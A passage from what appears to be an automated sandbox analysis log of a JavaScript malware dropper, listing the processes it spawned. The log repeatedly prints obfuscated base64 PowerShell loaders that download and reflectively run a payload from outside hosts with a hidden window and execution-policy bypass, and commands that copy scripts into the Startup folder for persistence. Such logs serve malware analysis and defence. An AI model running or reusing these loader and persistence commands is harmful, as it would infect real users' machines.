gBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::FrombaJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAH